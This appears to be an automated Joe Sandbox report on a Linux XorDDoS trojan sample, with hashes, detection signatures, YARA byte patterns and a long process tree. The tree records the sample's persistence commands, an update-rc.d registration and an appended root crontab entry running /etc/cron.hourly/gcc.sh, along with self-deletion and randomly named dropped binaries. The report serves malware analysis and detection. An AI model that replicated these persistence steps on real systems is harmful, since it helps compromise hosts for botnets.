Loading Joe Sandbox Report ...

Edit tour

Linux Analysis Report
HaJTqGiPpD

Overview

General Information

Sample name:HaJTqGiPpD
renamed because original name is a hash value
Original sample name:3bb61c0ad19495ae554363823eb83657b403c3aacdf9cddb9b111c2c4321a6da
Analysis ID:1495718
MD5:a14578469fab44514dfca6c4eead755d
SHA1:cf09ec13381b559a9d0e2ced5d8d710c8ba2affa
SHA256:3bb61c0ad19495ae554363823eb83657b403c3aacdf9cddb9b111c2c4321a6da
Infos:

Detection

XorDDoS
Score:100
Range:0 - 100
Whitelisted:false

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected XorDDoS Bot
Drops files in suspicious directories
Machine Learning detection for dropped file
Machine Learning detection for sample
Sample deletes itself
Sample tries to persist itself using System V runlevels
Sample tries to persist itself using cron
Drops files with innocent-looking names
Enumerates processes within the "proc" file system
Executes commands using a shell command-line interpreter
Executes the "rm" command used to delete files or directories
Executes the "systemctl" command used for controlling the systemd system and service manager
PID-file does not contain an ASCII number
Reads system information from the proc file system
Sample and/or dropped files contains symbols with suspicious names
Sleeps for long times indicative of sandbox evasion
Uses SMTP (mail sending)
Uses the "uname" system call to query kernel version information (possible evasion)
Writes ELF files to disk
Writes shell script file to disk with an unusual file extension
Writes shell script files to disk
Yara signature match

Classification

Joe Sandbox version:40.0.0 Tourmaline
Analysis ID:1495718
Start date and time:2024-08-20 15:32:32 +02:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 6m 21s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:defaultlinuxfilecookbook.jbs
Analysis system description:Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:default
Sample name:HaJTqGiPpD
renamed because original name is a hash value
Original Sample Name:3bb61c0ad19495ae554363823eb83657b403c3aacdf9cddb9b111c2c4321a6da
Detection:MAL
Classification:mal100.troj.evad.lin@0/19@126/0
  • VT rate limit hit for: HaJTqGiPpD
Command:/tmp/HaJTqGiPpD
PID:6229
Exit Code:0
Exit Code Info:
Killed:False
Standard Output:

Standard Error:
  • system is lnxubuntu20
  • dash New Fork (PID: 6202, Parent: 4331)
  • rm (PID: 6202, Parent: 4331, MD5: aa2b5496fdbfd88e38791ab81f90b95b) Arguments: rm -f /tmp/tmp.bf7OUfIiir /tmp/tmp.YpFzGJMNgu /tmp/tmp.lS9NOxlH0t
  • dash New Fork (PID: 6203, Parent: 4331)
  • rm (PID: 6203, Parent: 4331, MD5: aa2b5496fdbfd88e38791ab81f90b95b) Arguments: rm -f /tmp/tmp.bf7OUfIiir /tmp/tmp.YpFzGJMNgu /tmp/tmp.lS9NOxlH0t
  • HaJTqGiPpD (PID: 6229, Parent: 6127, MD5: a14578469fab44514dfca6c4eead755d) Arguments: /tmp/HaJTqGiPpD
    • HaJTqGiPpD New Fork (PID: 6230, Parent: 6229)
      • HaJTqGiPpD New Fork (PID: 6233, Parent: 6230)
        • update-rc.d (PID: 6234, Parent: 1860, MD5: 16a21f464119ea7fad1d3660de963637) Arguments: update-rc.d HaJTqGiPpD defaults
          • systemctl (PID: 6240, Parent: 6234, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl daemon-reload
      • sh (PID: 6235, Parent: 6230, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "sed -i '/\\/etc\\/cron.hourly\\/gcc.sh/d' /etc/crontab && echo '*/3 * * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab"
        • sh New Fork (PID: 6236, Parent: 6235)
        • sed (PID: 6236, Parent: 6235, MD5: 885062561f66aa1d4af4c54b9e7cc81a) Arguments: sed -i /\\/etc\\/cron.hourly\\/gcc.sh/d /etc/crontab
      • HaJTqGiPpD New Fork (PID: 6263, Parent: 6230)
        • kigdktzeum (PID: 6264, Parent: 6263, MD5: 487aaa06ee19b8dfaa6a6b2eef2535e4) Arguments: /usr/bin/kigdktzeum who 6230
      • HaJTqGiPpD New Fork (PID: 6266, Parent: 6230)
        • kigdktzeum (PID: 6267, Parent: 6266, MD5: 487aaa06ee19b8dfaa6a6b2eef2535e4) Arguments: /usr/bin/kigdktzeum sh 6230
      • HaJTqGiPpD New Fork (PID: 6269, Parent: 6230)
        • kigdktzeum (PID: 6270, Parent: 6269, MD5: 487aaa06ee19b8dfaa6a6b2eef2535e4) Arguments: /usr/bin/kigdktzeum "ls -la" 6230
      • HaJTqGiPpD New Fork (PID: 6272, Parent: 6230)
        • kigdktzeum (PID: 6273, Parent: 6272, MD5: 487aaa06ee19b8dfaa6a6b2eef2535e4) Arguments: /usr/bin/kigdktzeum uptime 6230
      • HaJTqGiPpD New Fork (PID: 6274, Parent: 6230)
        • kigdktzeum (PID: 6275, Parent: 6274, MD5: 487aaa06ee19b8dfaa6a6b2eef2535e4) Arguments: /usr/bin/kigdktzeum id 6230
      • HaJTqGiPpD New Fork (PID: 6280, Parent: 6230)
        • mizdkrdyqj (PID: 6281, Parent: 6280, MD5: e0198a1a12f1f0963ee32aeae9384d8b) Arguments: /usr/bin/mizdkrdyqj "ps -ef" 6230
      • HaJTqGiPpD New Fork (PID: 6283, Parent: 6230)
        • mizdkrdyqj (PID: 6284, Parent: 6283, MD5: e0198a1a12f1f0963ee32aeae9384d8b) Arguments: /usr/bin/mizdkrdyqj "ls -la" 6230
      • HaJTqGiPpD New Fork (PID: 6285, Parent: 6230)
        • mizdkrdyqj (PID: 6286, Parent: 6285, MD5: e0198a1a12f1f0963ee32aeae9384d8b) Arguments: /usr/bin/mizdkrdyqj "grep \"A\"" 6230
      • HaJTqGiPpD New Fork (PID: 6288, Parent: 6230)
        • mizdkrdyqj (PID: 6289, Parent: 6288, MD5: e0198a1a12f1f0963ee32aeae9384d8b) Arguments: /usr/bin/mizdkrdyqj sh 6230
      • HaJTqGiPpD New Fork (PID: 6291, Parent: 6230)
        • mizdkrdyqj (PID: 6292, Parent: 6291, MD5: e0198a1a12f1f0963ee32aeae9384d8b) Arguments: /usr/bin/mizdkrdyqj "sleep 1" 6230
      • HaJTqGiPpD New Fork (PID: 6298, Parent: 6230)
        • becqudbgme (PID: 6299, Parent: 6298, MD5: cb780d7ae3ef97f4221a67b15940a84d) Arguments: /usr/bin/becqudbgme su 6230
      • HaJTqGiPpD New Fork (PID: 6300, Parent: 6230)
        • becqudbgme (PID: 6302, Parent: 6300, MD5: cb780d7ae3ef97f4221a67b15940a84d) Arguments: /usr/bin/becqudbgme ls 6230
      • HaJTqGiPpD New Fork (PID: 6303, Parent: 6230)
        • becqudbgme (PID: 6305, Parent: 6303, MD5: cb780d7ae3ef97f4221a67b15940a84d) Arguments: /usr/bin/becqudbgme su 6230
      • HaJTqGiPpD New Fork (PID: 6306, Parent: 6230)
        • becqudbgme (PID: 6307, Parent: 6306, MD5: cb780d7ae3ef97f4221a67b15940a84d) Arguments: /usr/bin/becqudbgme bash 6230
      • HaJTqGiPpD New Fork (PID: 6310, Parent: 6230)
        • becqudbgme (PID: 6311, Parent: 6310, MD5: cb780d7ae3ef97f4221a67b15940a84d) Arguments: /usr/bin/becqudbgme sh 6230
      • HaJTqGiPpD New Fork (PID: 6328, Parent: 6230)
        • sxruomujjd (PID: 6329, Parent: 6328, MD5: cba8307e43bff3556880dcd526a511a5) Arguments: /usr/bin/sxruomujjd "ps -ef" 6230
      • HaJTqGiPpD New Fork (PID: 6331, Parent: 6230)
        • sxruomujjd (PID: 6332, Parent: 6331, MD5: cba8307e43bff3556880dcd526a511a5) Arguments: /usr/bin/sxruomujjd "netstat -antop" 6230
      • HaJTqGiPpD New Fork (PID: 6333, Parent: 6230)
        • sxruomujjd (PID: 6334, Parent: 6333, MD5: cba8307e43bff3556880dcd526a511a5) Arguments: /usr/bin/sxruomujjd top 6230
      • HaJTqGiPpD New Fork (PID: 6336, Parent: 6230)
        • sxruomujjd (PID: 6337, Parent: 6336, MD5: cba8307e43bff3556880dcd526a511a5) Arguments: /usr/bin/sxruomujjd "ps -ef" 6230
      • HaJTqGiPpD New Fork (PID: 6338, Parent: 6230)
        • sxruomujjd (PID: 6339, Parent: 6338, MD5: cba8307e43bff3556880dcd526a511a5) Arguments: /usr/bin/sxruomujjd "cat resolv.conf" 6230
      • HaJTqGiPpD New Fork (PID: 6345, Parent: 6230)
        • qrabekbstr (PID: 6346, Parent: 6345, MD5: 1975c0ca7e1b7192bccb225af16f47b5) Arguments: /usr/bin/qrabekbstr bash 6230
      • HaJTqGiPpD New Fork (PID: 6348, Parent: 6230)
        • qrabekbstr (PID: 6349, Parent: 6348, MD5: 1975c0ca7e1b7192bccb225af16f47b5) Arguments: /usr/bin/qrabekbstr sh 6230
      • HaJTqGiPpD New Fork (PID: 6351, Parent: 6230)
        • qrabekbstr (PID: 6352, Parent: 6351, MD5: 1975c0ca7e1b7192bccb225af16f47b5) Arguments: /usr/bin/qrabekbstr pwd 6230
      • HaJTqGiPpD New Fork (PID: 6353, Parent: 6230)
        • qrabekbstr (PID: 6354, Parent: 6353, MD5: 1975c0ca7e1b7192bccb225af16f47b5) Arguments: /usr/bin/qrabekbstr top 6230
      • HaJTqGiPpD New Fork (PID: 6356, Parent: 6230)
        • qrabekbstr (PID: 6357, Parent: 6356, MD5: 1975c0ca7e1b7192bccb225af16f47b5) Arguments: /usr/bin/qrabekbstr "netstat -antop" 6230
      • HaJTqGiPpD New Fork (PID: 6364, Parent: 6230)
        • sotpizdssr (PID: 6365, Parent: 6364, MD5: 60d7d2347ab3a1dd326249ca54ebfd91) Arguments: /usr/bin/sotpizdssr top 6230
      • HaJTqGiPpD New Fork (PID: 6367, Parent: 6230)
        • sotpizdssr (PID: 6368, Parent: 6367, MD5: 60d7d2347ab3a1dd326249ca54ebfd91) Arguments: /usr/bin/sotpizdssr "route -n" 6230
      • HaJTqGiPpD New Fork (PID: 6370, Parent: 6230)
        • sotpizdssr (PID: 6371, Parent: 6370, MD5: 60d7d2347ab3a1dd326249ca54ebfd91) Arguments: /usr/bin/sotpizdssr "sleep 1" 6230
      • HaJTqGiPpD New Fork (PID: 6372, Parent: 6230)
        • sotpizdssr (PID: 6373, Parent: 6372, MD5: 60d7d2347ab3a1dd326249ca54ebfd91) Arguments: /usr/bin/sotpizdssr "ifconfig eth0" 6230
      • HaJTqGiPpD New Fork (PID: 6375, Parent: 6230)
        • sotpizdssr (PID: 6376, Parent: 6375, MD5: 60d7d2347ab3a1dd326249ca54ebfd91) Arguments: /usr/bin/sotpizdssr who 6230
      • HaJTqGiPpD New Fork (PID: 6381, Parent: 6230)
        • gnmftoxpza (PID: 6382, Parent: 6381, MD5: e0c968701ddbbebdd70eb5c8f3abeeb5) Arguments: /usr/bin/gnmftoxpza sh 6230
      • HaJTqGiPpD New Fork (PID: 6384, Parent: 6230)
        • gnmftoxpza (PID: 6385, Parent: 6384, MD5: e0c968701ddbbebdd70eb5c8f3abeeb5) Arguments: /usr/bin/gnmftoxpza "route -n" 6230
      • HaJTqGiPpD New Fork (PID: 6387, Parent: 6230)
        • gnmftoxpza (PID: 6388, Parent: 6387, MD5: e0c968701ddbbebdd70eb5c8f3abeeb5) Arguments: /usr/bin/gnmftoxpza top 6230
      • HaJTqGiPpD New Fork (PID: 6389, Parent: 6230)
        • gnmftoxpza (PID: 6390, Parent: 6389, MD5: e0c968701ddbbebdd70eb5c8f3abeeb5) Arguments: /usr/bin/gnmftoxpza gnome-terminal 6230
      • HaJTqGiPpD New Fork (PID: 6392, Parent: 6230)
        • gnmftoxpza (PID: 6393, Parent: 6392, MD5: e0c968701ddbbebdd70eb5c8f3abeeb5) Arguments: /usr/bin/gnmftoxpza su 6230
      • HaJTqGiPpD New Fork (PID: 6398, Parent: 6230)
        • iulapzbfpq (PID: 6399, Parent: 6398, MD5: 7800f11c348419e086e37dfb8e609c16) Arguments: /usr/bin/iulapzbfpq "grep \"A\"" 6230
      • HaJTqGiPpD New Fork (PID: 6401, Parent: 6230)
        • iulapzbfpq (PID: 6402, Parent: 6401, MD5: 7800f11c348419e086e37dfb8e609c16) Arguments: /usr/bin/iulapzbfpq ifconfig 6230
      • HaJTqGiPpD New Fork (PID: 6404, Parent: 6230)
        • iulapzbfpq (PID: 6405, Parent: 6404, MD5: 7800f11c348419e086e37dfb8e609c16) Arguments: /usr/bin/iulapzbfpq who 6230
      • HaJTqGiPpD New Fork (PID: 6406, Parent: 6230)
        • iulapzbfpq (PID: 6407, Parent: 6406, MD5: 7800f11c348419e086e37dfb8e609c16) Arguments: /usr/bin/iulapzbfpq gnome-terminal 6230
      • HaJTqGiPpD New Fork (PID: 6409, Parent: 6230)
        • iulapzbfpq (PID: 6411, Parent: 6409, MD5: 7800f11c348419e086e37dfb8e609c16) Arguments: /usr/bin/iulapzbfpq "netstat -antop" 6230
      • HaJTqGiPpD New Fork (PID: 6418, Parent: 6230)
        • posifzmmhg (PID: 6419, Parent: 6418, MD5: 1537102237a8f774a8ec3660ded7ea96) Arguments: /usr/bin/posifzmmhg "netstat -an" 6230
      • HaJTqGiPpD New Fork (PID: 6421, Parent: 6230)
        • posifzmmhg (PID: 6422, Parent: 6421, MD5: 1537102237a8f774a8ec3660ded7ea96) Arguments: /usr/bin/posifzmmhg "ifconfig eth0" 6230
      • HaJTqGiPpD New Fork (PID: 6423, Parent: 6230)
        • posifzmmhg (PID: 6424, Parent: 6423, MD5: 1537102237a8f774a8ec3660ded7ea96) Arguments: /usr/bin/posifzmmhg pwd 6230
      • HaJTqGiPpD New Fork (PID: 6426, Parent: 6230)
        • posifzmmhg (PID: 6427, Parent: 6426, MD5: 1537102237a8f774a8ec3660ded7ea96) Arguments: /usr/bin/posifzmmhg "netstat -antop" 6230
      • HaJTqGiPpD New Fork (PID: 6429, Parent: 6230)
        • posifzmmhg (PID: 6430, Parent: 6429, MD5: 1537102237a8f774a8ec3660ded7ea96) Arguments: /usr/bin/posifzmmhg top 6230
      • HaJTqGiPpD New Fork (PID: 6435, Parent: 6230)
        • buxftyvhwp (PID: 6436, Parent: 6435, MD5: 7b2961599910e9c0848d93f2a9e7562f) Arguments: /usr/bin/buxftyvhwp "netstat -an" 6230
      • HaJTqGiPpD New Fork (PID: 6438, Parent: 6230)
        • buxftyvhwp (PID: 6439, Parent: 6438, MD5: 7b2961599910e9c0848d93f2a9e7562f) Arguments: /usr/bin/buxftyvhwp "netstat -an" 6230
      • HaJTqGiPpD New Fork (PID: 6440, Parent: 6230)
        • buxftyvhwp (PID: 6441, Parent: 6440, MD5: 7b2961599910e9c0848d93f2a9e7562f) Arguments: /usr/bin/buxftyvhwp pwd 6230
      • HaJTqGiPpD New Fork (PID: 6443, Parent: 6230)
        • buxftyvhwp (PID: 6444, Parent: 6443, MD5: 7b2961599910e9c0848d93f2a9e7562f) Arguments: /usr/bin/buxftyvhwp pwd 6230
      • HaJTqGiPpD New Fork (PID: 6445, Parent: 6230)
        • buxftyvhwp (PID: 6446, Parent: 6445, MD5: 7b2961599910e9c0848d93f2a9e7562f) Arguments: /usr/bin/buxftyvhwp "netstat -antop" 6230
      • HaJTqGiPpD New Fork (PID: 6452, Parent: 6230)
        • wvbxepjyjx (PID: 6453, Parent: 6452, MD5: 8c8e618efd671f62350f8ff8336cb8bc) Arguments: /usr/bin/wvbxepjyjx "netstat -an" 6230
      • HaJTqGiPpD New Fork (PID: 6454, Parent: 6230)
        • wvbxepjyjx (PID: 6455, Parent: 6454, MD5: 8c8e618efd671f62350f8ff8336cb8bc) Arguments: /usr/bin/wvbxepjyjx gnome-terminal 6230
      • HaJTqGiPpD New Fork (PID: 6457, Parent: 6230)
        • wvbxepjyjx (PID: 6459, Parent: 6457, MD5: 8c8e618efd671f62350f8ff8336cb8bc) Arguments: /usr/bin/wvbxepjyjx bash 6230
      • HaJTqGiPpD New Fork (PID: 6461, Parent: 6230)
        • wvbxepjyjx (PID: 6462, Parent: 6461, MD5: 8c8e618efd671f62350f8ff8336cb8bc) Arguments: /usr/bin/wvbxepjyjx "netstat -antop" 6230
      • HaJTqGiPpD New Fork (PID: 6463, Parent: 6230)
        • wvbxepjyjx (PID: 6464, Parent: 6463, MD5: 8c8e618efd671f62350f8ff8336cb8bc) Arguments: /usr/bin/wvbxepjyjx top 6230
      • HaJTqGiPpD New Fork (PID: 6469, Parent: 6230)
        • eqznayducj (PID: 6470, Parent: 6469, MD5: 9a54fa11d5b90703482052dcd884c96b) Arguments: /usr/bin/eqznayducj "cd /etc" 6230
      • HaJTqGiPpD New Fork (PID: 6472, Parent: 6230)
        • eqznayducj (PID: 6473, Parent: 6472, MD5: 9a54fa11d5b90703482052dcd884c96b) Arguments: /usr/bin/eqznayducj sh 6230
      • HaJTqGiPpD New Fork (PID: 6474, Parent: 6230)
        • eqznayducj (PID: 6475, Parent: 6474, MD5: 9a54fa11d5b90703482052dcd884c96b) Arguments: /usr/bin/eqznayducj ifconfig 6230
      • HaJTqGiPpD New Fork (PID: 6477, Parent: 6230)
        • eqznayducj (PID: 6479, Parent: 6477, MD5: 9a54fa11d5b90703482052dcd884c96b) Arguments: /usr/bin/eqznayducj top 6230
      • HaJTqGiPpD New Fork (PID: 6480, Parent: 6230)
        • eqznayducj (PID: 6482, Parent: 6480, MD5: 9a54fa11d5b90703482052dcd884c96b) Arguments: /usr/bin/eqznayducj "ifconfig eth0" 6230
      • HaJTqGiPpD New Fork (PID: 6486, Parent: 6230)
        • ibkljkndlm (PID: 6487, Parent: 6486, MD5: f509e839e4e038de164ecdecb9aa9404) Arguments: /usr/bin/ibkljkndlm su 6230
      • HaJTqGiPpD New Fork (PID: 6491, Parent: 6230)
        • ibkljkndlm (PID: 6492, Parent: 6491, MD5: f509e839e4e038de164ecdecb9aa9404) Arguments: /usr/bin/ibkljkndlm ls 6230
      • HaJTqGiPpD New Fork (PID: 6493, Parent: 6230)
        • ibkljkndlm (PID: 6495, Parent: 6493, MD5: f509e839e4e038de164ecdecb9aa9404) Arguments: /usr/bin/ibkljkndlm "netstat -antop" 6230
      • HaJTqGiPpD New Fork (PID: 6496, Parent: 6230)
        • ibkljkndlm (PID: 6497, Parent: 6496, MD5: f509e839e4e038de164ecdecb9aa9404) Arguments: /usr/bin/ibkljkndlm "ps -ef" 6230
      • HaJTqGiPpD New Fork (PID: 6499, Parent: 6230)
        • ibkljkndlm (PID: 6500, Parent: 6499, MD5: f509e839e4e038de164ecdecb9aa9404) Arguments: /usr/bin/ibkljkndlm "cd /etc" 6230
      • HaJTqGiPpD New Fork (PID: 6506, Parent: 6230)
        • oarnkspbbo (PID: 6507, Parent: 6506, MD5: 3d96ab25c872e7fc62945f69932798cd) Arguments: /usr/bin/oarnkspbbo who 6230
      • HaJTqGiPpD New Fork (PID: 6509, Parent: 6230)
        • oarnkspbbo (PID: 6510, Parent: 6509, MD5: 3d96ab25c872e7fc62945f69932798cd) Arguments: /usr/bin/oarnkspbbo "sleep 1" 6230
      • HaJTqGiPpD New Fork (PID: 6512, Parent: 6230)
        • oarnkspbbo (PID: 6513, Parent: 6512, MD5: 3d96ab25c872e7fc62945f69932798cd) Arguments: /usr/bin/oarnkspbbo "sleep 1" 6230
      • HaJTqGiPpD New Fork (PID: 6514, Parent: 6230)
        • oarnkspbbo (PID: 6516, Parent: 6514, MD5: 3d96ab25c872e7fc62945f69932798cd) Arguments: /usr/bin/oarnkspbbo "cat resolv.conf" 6230
      • HaJTqGiPpD New Fork (PID: 6517, Parent: 6230)
        • oarnkspbbo (PID: 6518, Parent: 6517, MD5: 3d96ab25c872e7fc62945f69932798cd) Arguments: /usr/bin/oarnkspbbo su 6230
      • HaJTqGiPpD New Fork (PID: 6523, Parent: 6230)
        • ungjrprpkb (PID: 6524, Parent: 6523, MD5: 3f65b405d072a72c577de91340204441) Arguments: /usr/bin/ungjrprpkb "netstat -antop" 6230
      • HaJTqGiPpD New Fork (PID: 6526, Parent: 6230)
        • ungjrprpkb (PID: 6527, Parent: 6526, MD5: 3f65b405d072a72c577de91340204441) Arguments: /usr/bin/ungjrprpkb "cd /etc" 6230
      • HaJTqGiPpD New Fork (PID: 6529, Parent: 6230)
        • ungjrprpkb (PID: 6530, Parent: 6529, MD5: 3f65b405d072a72c577de91340204441) Arguments: /usr/bin/ungjrprpkb "ls -la" 6230
      • HaJTqGiPpD New Fork (PID: 6532, Parent: 6230)
        • ungjrprpkb (PID: 6533, Parent: 6532, MD5: 3f65b405d072a72c577de91340204441) Arguments: /usr/bin/ungjrprpkb uptime 6230
      • HaJTqGiPpD New Fork (PID: 6534, Parent: 6230)
        • ungjrprpkb (PID: 6535, Parent: 6534, MD5: 3f65b405d072a72c577de91340204441) Arguments: /usr/bin/ungjrprpkb "route -n" 6230
      • HaJTqGiPpD New Fork (PID: 6540, Parent: 6230)
        • gdmrzwxnqy (PID: 6541, Parent: 6540, MD5: 7ece6ba9fe32b7d91c5dcf497de20033) Arguments: /usr/bin/gdmrzwxnqy su 6230
      • HaJTqGiPpD New Fork (PID: 6543, Parent: 6230)
        • gdmrzwxnqy (PID: 6544, Parent: 6543, MD5: 7ece6ba9fe32b7d91c5dcf497de20033) Arguments: /usr/bin/gdmrzwxnqy su 6230
      • HaJTqGiPpD New Fork (PID: 6546, Parent: 6230)
        • gdmrzwxnqy (PID: 6547, Parent: 6546, MD5: 7ece6ba9fe32b7d91c5dcf497de20033) Arguments: /usr/bin/gdmrzwxnqy who 6230
      • HaJTqGiPpD New Fork (PID: 6548, Parent: 6230)
        • gdmrzwxnqy (PID: 6549, Parent: 6548, MD5: 7ece6ba9fe32b7d91c5dcf497de20033) Arguments: /usr/bin/gdmrzwxnqy "ps -ef" 6230
      • HaJTqGiPpD New Fork (PID: 6550, Parent: 6230)
        • gdmrzwxnqy (PID: 6553, Parent: 6550, MD5: 7ece6ba9fe32b7d91c5dcf497de20033) Arguments: /usr/bin/gdmrzwxnqy sh 6230
      • HaJTqGiPpD New Fork (PID: 6557, Parent: 6230)
        • eperfpvgsg (PID: 6558, Parent: 6557, MD5: c73832bb64ed9d499daa35bea23c2bf5) Arguments: /usr/bin/eperfpvgsg ls 6230
      • HaJTqGiPpD New Fork (PID: 6560, Parent: 6230)
        • eperfpvgsg (PID: 6561, Parent: 6560, MD5: c73832bb64ed9d499daa35bea23c2bf5) Arguments: /usr/bin/eperfpvgsg "cat resolv.conf" 6230
      • HaJTqGiPpD New Fork (PID: 6562, Parent: 6230)
        • eperfpvgsg (PID: 6563, Parent: 1860, MD5: c73832bb64ed9d499daa35bea23c2bf5) Arguments: /usr/bin/eperfpvgsg ls 6230
      • HaJTqGiPpD New Fork (PID: 6564, Parent: 6230)
        • eperfpvgsg (PID: 6565, Parent: 1860, MD5: c73832bb64ed9d499daa35bea23c2bf5) Arguments: /usr/bin/eperfpvgsg "ls -la" 6230
      • HaJTqGiPpD New Fork (PID: 6566, Parent: 6230)
        • eperfpvgsg (PID: 6567, Parent: 1860, MD5: c73832bb64ed9d499daa35bea23c2bf5) Arguments: /usr/bin/eperfpvgsg pwd 6230
      • HaJTqGiPpD New Fork (PID: 6575, Parent: 6230)
        • kfgwgvyckw (PID: 6576, Parent: 6575, MD5: 30de9814b108653bd6e70efbc3520d2e) Arguments: /usr/bin/kfgwgvyckw "sleep 1" 6230
      • HaJTqGiPpD New Fork (PID: 6577, Parent: 6230)
        • kfgwgvyckw (PID: 6578, Parent: 1860, MD5: 30de9814b108653bd6e70efbc3520d2e) Arguments: /usr/bin/kfgwgvyckw bash 6230
      • HaJTqGiPpD New Fork (PID: 6579, Parent: 6230)
        • kfgwgvyckw (PID: 6581, Parent: 1860, MD5: 30de9814b108653bd6e70efbc3520d2e) Arguments: /usr/bin/kfgwgvyckw id 6230
      • HaJTqGiPpD New Fork (PID: 6582, Parent: 6230)
        • kfgwgvyckw (PID: 6583, Parent: 1860, MD5: 30de9814b108653bd6e70efbc3520d2e) Arguments: /usr/bin/kfgwgvyckw "netstat -an" 6230
      • HaJTqGiPpD New Fork (PID: 6585, Parent: 6230)
        • kfgwgvyckw (PID: 6586, Parent: 1860, MD5: 30de9814b108653bd6e70efbc3520d2e) Arguments: /usr/bin/kfgwgvyckw "sleep 1" 6230
      • HaJTqGiPpD New Fork (PID: 6592, Parent: 6230)
        • hymrnjeilx (PID: 6593, Parent: 1860, MD5: c629e828153da3fd68b89cb0ab74ae95) Arguments: /usr/bin/hymrnjeilx bash 6230
      • HaJTqGiPpD New Fork (PID: 6594, Parent: 6230)
        • hymrnjeilx (PID: 6595, Parent: 1860, MD5: c629e828153da3fd68b89cb0ab74ae95) Arguments: /usr/bin/hymrnjeilx pwd 6230
      • HaJTqGiPpD New Fork (PID: 6596, Parent: 6230)
        • hymrnjeilx (PID: 6598, Parent: 1860, MD5: c629e828153da3fd68b89cb0ab74ae95) Arguments: /usr/bin/hymrnjeilx gnome-terminal 6230
      • HaJTqGiPpD New Fork (PID: 6599, Parent: 6230)
        • hymrnjeilx (PID: 6601, Parent: 1860, MD5: c629e828153da3fd68b89cb0ab74ae95) Arguments: /usr/bin/hymrnjeilx gnome-terminal 6230
      • HaJTqGiPpD New Fork (PID: 6602, Parent: 6230)
        • hymrnjeilx (PID: 6604, Parent: 1860, MD5: c629e828153da3fd68b89cb0ab74ae95) Arguments: /usr/bin/hymrnjeilx "ls -la" 6230
      • HaJTqGiPpD New Fork (PID: 6612, Parent: 6230)
        • rjhjbiwpsr (PID: 6613, Parent: 6612, MD5: 443f96e802359086570a6f584c903966) Arguments: /usr/bin/rjhjbiwpsr uptime 6230
      • HaJTqGiPpD New Fork (PID: 6614, Parent: 6230)
        • rjhjbiwpsr (PID: 6615, Parent: 1860, MD5: 443f96e802359086570a6f584c903966) Arguments: /usr/bin/rjhjbiwpsr "grep \"A\"" 6230
      • HaJTqGiPpD New Fork (PID: 6616, Parent: 6230)
        • rjhjbiwpsr (PID: 6618, Parent: 1860, MD5: 443f96e802359086570a6f584c903966) Arguments: /usr/bin/rjhjbiwpsr ls 6230
      • HaJTqGiPpD New Fork (PID: 6619, Parent: 6230)
        • rjhjbiwpsr (PID: 6620, Parent: 1860, MD5: 443f96e802359086570a6f584c903966) Arguments: /usr/bin/rjhjbiwpsr gnome-terminal 6230
      • HaJTqGiPpD New Fork (PID: 6621, Parent: 6230)
        • rjhjbiwpsr (PID: 6623, Parent: 1860, MD5: 443f96e802359086570a6f584c903966) Arguments: /usr/bin/rjhjbiwpsr "cd /etc" 6230
      • HaJTqGiPpD New Fork (PID: 6629, Parent: 6230)
        • nopfevkjnk (PID: 6630, Parent: 6629, MD5: b246baae89c9f63df84f140ebbf62206) Arguments: /usr/bin/nopfevkjnk who 6230
      • HaJTqGiPpD New Fork (PID: 6631, Parent: 6230)
        • nopfevkjnk (PID: 6632, Parent: 1860, MD5: b246baae89c9f63df84f140ebbf62206) Arguments: /usr/bin/nopfevkjnk top 6230
      • HaJTqGiPpD New Fork (PID: 6633, Parent: 6230)
        • nopfevkjnk (PID: 6635, Parent: 1860, MD5: b246baae89c9f63df84f140ebbf62206) Arguments: /usr/bin/nopfevkjnk "sleep 1" 6230
      • HaJTqGiPpD New Fork (PID: 6636, Parent: 6230)
        • nopfevkjnk (PID: 6637, Parent: 1860, MD5: b246baae89c9f63df84f140ebbf62206) Arguments: /usr/bin/nopfevkjnk uptime 6230
      • HaJTqGiPpD New Fork (PID: 6638, Parent: 6230)
        • nopfevkjnk (PID: 6640, Parent: 1860, MD5: b246baae89c9f63df84f140ebbf62206) Arguments: /usr/bin/nopfevkjnk "grep \"A\"" 6230
      • HaJTqGiPpD New Fork (PID: 6646, Parent: 6230)
        • vjejifjmgs (PID: 6647, Parent: 6646, MD5: d334dfbf8bb47bf697921a7ccd6b3ad6) Arguments: /usr/bin/vjejifjmgs uptime 6230
      • HaJTqGiPpD New Fork (PID: 6648, Parent: 6230)
        • vjejifjmgs (PID: 6649, Parent: 1860, MD5: d334dfbf8bb47bf697921a7ccd6b3ad6) Arguments: /usr/bin/vjejifjmgs id 6230
      • HaJTqGiPpD New Fork (PID: 6650, Parent: 6230)
        • vjejifjmgs (PID: 6651, Parent: 1860, MD5: d334dfbf8bb47bf697921a7ccd6b3ad6) Arguments: /usr/bin/vjejifjmgs "grep \"A\"" 6230
      • HaJTqGiPpD New Fork (PID: 6653, Parent: 6230)
        • vjejifjmgs (PID: 6654, Parent: 1860, MD5: d334dfbf8bb47bf697921a7ccd6b3ad6) Arguments: /usr/bin/vjejifjmgs sh 6230
      • HaJTqGiPpD New Fork (PID: 6655, Parent: 6230)
        • vjejifjmgs (PID: 6656, Parent: 1860, MD5: d334dfbf8bb47bf697921a7ccd6b3ad6) Arguments: /usr/bin/vjejifjmgs pwd 6230
  • systemd New Fork (PID: 6242, Parent: 6241)
  • snapd-env-generator (PID: 6242, Parent: 6241, MD5: 3633b075f40283ec938a2a6a89671b0e) Arguments: /usr/lib/systemd/system-environment-generators/snapd-env-generator
  • cleanup
SourceRuleDescriptionAuthorStrings
HaJTqGiPpDJoeSecurity_XorDDoSYara detected XorDDoS BotJoe Security
    HaJTqGiPpDLinux_Trojan_Xorddos_2aef46a6unknownunknown
    • 0x6af99:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
    HaJTqGiPpDLinux_Trojan_Xorddos_0eb147caunknownunknown
    • 0x2960:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
    • 0x29e3:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
    HaJTqGiPpDLinux_Trojan_Xorddos_884cab60unknownunknown
